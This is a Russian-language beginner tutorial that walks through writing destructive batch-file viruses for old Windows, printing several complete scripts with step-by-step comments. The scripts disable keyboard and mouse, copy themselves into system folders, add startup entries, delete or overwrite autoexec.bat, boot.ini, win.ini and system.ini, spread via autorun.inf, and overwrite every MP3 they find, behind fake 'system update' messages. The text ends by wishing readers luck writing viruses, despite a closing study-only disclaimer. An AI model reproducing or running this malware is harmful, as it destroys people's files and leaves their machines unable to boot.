Привет тебе снова, юный кодер-шкодер. Если ты читал прошлую мою статью под названием “Учим ДОС”, то ничего сложного тут для тебя не будет. А если не читал, то внимательно смотри комментарии. Итак, начнем. Сижу я однажды и думаю: а не накатать ли мне вирус? А так как кроме QБарсика я ничего не знал, а ДОС был моим вторым … [Братом], а ты что подумал извращенец? :)~. ТО я решил писать вирус на нем, и оказалось это не так трудно.

Вот тело моего первого вируса

@echo off
rundll32 keyboard,disable
rundll32 mouse,disable
copy %0 %windir%/system
echo run=%windir%/system/*.bat >> win.ini
echo run=%windir%/system/*.bat >> system.ini
label LOHOLAMMER
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat > nul
echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(“WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(“Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
pause
cls

Объясняю популярно и по шагам:

1 @echo off – Запрещаем ДОСовскому окошку показывать, что делает скрипт.
2 rundll32 keyboard,disable – Отключаем клаву, на случай если юзер поймет что происходит и надумает нажать CTRL+C
3 rundll32 mouse,disable – Отключаем мышь тоже на всякий.
4 copy %0 %windir%/system – Копируемся в папку windows/system
// %0 – Переменная, указывающая на исходный файл-вирус
// %windir% – переменная папка масдая.
5 echo run=%windir%/system/*.bat >> %windir%\win.ini – Добавляет текст “run=%windir%/system/*.bat” в файл win.ini
6 echo run=%windir%/system/*.bat >> %windir%\system.ini – Добавляет текст “run=%windir%/system/*.bat” в файл system.ini
7 label LOHOLAMMER – Меняет имя диску c:\ на “LOHOLAMMER”
8 if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r – Проверяем если есть файл c:\autoexec.bat то убираем
//у него атрибуты -h -s -a -r
9 deltree /y c:\autoexec.bat – Удаляем файл c:\autoexec.bat , если не убрать атрибуты, то программа не удалит файл.
10 echo autoexec.bat echo YOU ARE LAMMER…xe-xe-xe > c:\autoexec.bat – Добавить текст “YOU ARE LAMMER…xe-xe-xe”
//в новый файл autoexec.bat
11 rundll32 mouse,enable – Включаем, пускай думает, что ниче не было.
12 rundll32 keyboard,enable – Включаем, пускай думает, что ниче не было.
13 echo var WSHShell = WScript.CreateObject(“WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(“Warning,.. Ваш компьютер заражен вирусом, а избавиться от него нельзя, хе-хе-хе”); >> %temp%\mes.js
start %temp%\mes.js. //Этот текст выводит масдайное окно с надписью
deltree /y %temp%\mes.js //А потом стирает за собой следы.
14 attrib c:\autoexec.bat +h +s +a +r – Делает файл c:\autoexec.bat скрытым и системный чтоб ламер ничего не заподозрил.
15 pause – Просим нажать любую клавишу (Не обязательно нажимать ведь вирь уже сделал свое дело.)
16 cls – Выходим

Эта программа, при следующей перезагрузке не даст загрузиться виндовсу и будет писать ‘Вы ламер.’ .Работает только в винде до 2000.

Идем дальше, пишем новый вирус. Те функции, которые были упомянуты уже, не будут объясняться заново. Это просто усовершенствованная версия прошлого вируса.

@echo off
rundll32 user,setcursorpos //Убираем с экрана курсор в левый угол
rundll32 keyboard,disable //Было
rundll32 mouse,disable //Было
rundll32 user,swapmousebutton. //Тут мы переставляем кнопки мыши
echo Обновление параметров системы, пожалуйста подождите… //пишет отмазку :)
label mp_k //Меняем имя диску
copy mp_k.exe %windir% //Копирует себя в папку windows
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
deltree /y c:\autoexec.bat
if exist c:\io.sys echo autoexec.bat echo YOU_ARE_LAMMER….[]=[_H@CKED_BY_[kas]*_”SmallPox_Vir_Org”_] > c:\autoexec.bat
echo run = %windir%\mp_k.exe >> %windir%\win.ini
echo run = %windir%\mp_k.exe >> %windir%\system.ini
echo [AutoRun] > c:\autorun.inf //Эти операции есть в прошлом вирусе.
echo open=c:\autoexec.bat > c:\autorun.inf
echo [AutoRun] > d:\autorun.inf
echo open=c:\autoexec.bat > d:\autorun.inf
rundll32 mouse,enable
rundll32 keyboard,enable
echo var WSHShell = WScript.CreateObject(“WScript.Shell”); > %temp%\mes.js
echo WSHShell.Popup(“Warning,.. А теперь необходимо перезагрузиться”); >> %temp%\mes.js
start %temp%\mes.js
deltree /y %temp%\mes.js
attrib c:\autoexec.bat +h +s +a +r
attrib %windir%\mp_k.exe +h +s +a +r
attrib c:\autorun.inf +h +s +a +r
attrib d:\autorun.inf +h +s +a +r
deltree /y mp_k.exe
rmdir %windir%\temp //Удаляем папку temp
mkdir %windir%\temp //Создаем папку temp
cls

А теперь, что-то новое.

@echo off
cls
echo Please wait, updating system…
ctty nul. //Это новая команда, она отключает вывод текста в окошке.
exist %WINDIR%\SYSTEM\VMM32\%0 goto :end //Если вирь уже запускался то пусть запустит себя снова.
copy %0 %WINDIR%\SYSTEM\VMM32
cd c:\ //Переходим в другую директорию
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Заменяем в этой папке все файлы mp3 своим текстом
cd d:\
for %%a in (*.mp3 c:\*.mp3 c:\MUZ\*.mp3 c:\My Music\*.mp3 ..\*.mp3) do copy /y %0 %%a
cd My Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a //Тут тоже самое.
cd My_Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MyMusic
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Music
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музыка
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd Музон
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd MUZ
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
cd mp3
for %%a in (*.mp3 ..\*.mp3 \..\*.mp3 .\*.mp3 \.\*.mp3) do copy /y %0 %%a
:end //Метка
start /m /w %WINDIR%\SYSTEM\VMM32\%0 //Запуск в свернутом режиме
ctty con //Врубаем разрешение на показ текста в окне
echo Say goodbye your MP3 collection :)) Virus [BAT.kas.a] //Прощальные строки
cls //Выход.

Тут мало нового но уже что-то. Идем дальше. Накачал я с инета BAT-вирусов и начал их исследовать. И вот результаты:
Написал еще пару своих:

ctty nul //Было такое
REM Чй† Ђь@uoњPSQRVW
?
‹тЌ
” Q_ь№ у¦u=
є №є њъ.я?ђ л,ђ ///
copy %0 *.exe ///
copy %0 b.com>nul // Эта технология взята с вируса другово.
b.com. // Эти каракули перехватывают рабочие в данный момент файлы, и херит их.
del b.com. /// Это текст АСМ скомпиленого в exe
rem _^ZY[Xќњъ.я?ђ К ђђђђъ.я.ђ К ћ # @echoђё.5Н.Њ ‘ ‰?ђ Ќ ё.%Н.Ќ є Н’ђђ //
@echo off //
echo XEP_BAM //Пишем злобно и красиво.
if exist %windir%/%0.bat goto :end //Проверка виря на запускание, те был ли он запущен.
@rundll32 user,setcursorpos
ctty con //Было такое
echo Обновление параметров системы, пожалуйста подождите… //Отвлекаем.
@label BAT.c
copy %0.bat %windir% > nul
if exist c:\autoexec.bat attrib c:\autoexec.bat -h -s -a -r
if exist c:\boot.ini attrib c:\boot.ini -h -s -a -r
deltree /y c:\autoexec.bat
deltree /y c:\boot.ini
if exist c:\autoexec.bat echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\autoexec.bat
if exist c:\boot.ini echo autoexec.bat echo YOU_ARE_LAMMER…. > c:\boot.ini //Это для XP он там вместо autoexec.bat ;)
deltree /y %windir%/win.ini

copy %0 > %windir%/win.ini
deltree /y %windir%/system.ini
copy %0 > %windir%/system.ini
if exist c:\io.sys //Проверка наличия диска так как на каждом диске есть файл io.sys
echo [AutoRun] > c:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> c:\autorun.inf //И если он есть заразить его.
if exist d:\io.sys //Проверка наличия диска
echo [AutoRun] > d:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> d:\autorun.inf //И если он есть заразить его.
if exist e:\io.sys //Проверка наличия диска
echo [AutoRun] > e:\autorun.inf //И если он есть заразить его.
echo open=c:\autoexec.bat >> e:\autorun.inf //И если он есть заразить его.
:end //Метка СМ начало.
cls //Выход

О какие бывают вирусы. И на что только ни ухитряются вирусописатели, чтобы добиться нужного результата. Прочитав эту доку ты с уверенностью сможешь сам написать BAT вирус, даже лучше моего ;).Ну удачи тебе в написании вирей, а я отклонюсь и свалю пить пиво %-).

Статьи написаны исключительно для изучения алгоритмов работы вирусов и методов борьбы с ними. Алгоритмы работы вирусов были выявлены при декомпиляции найденных в интернете вирусов и на сайте Лаборатории Касперского.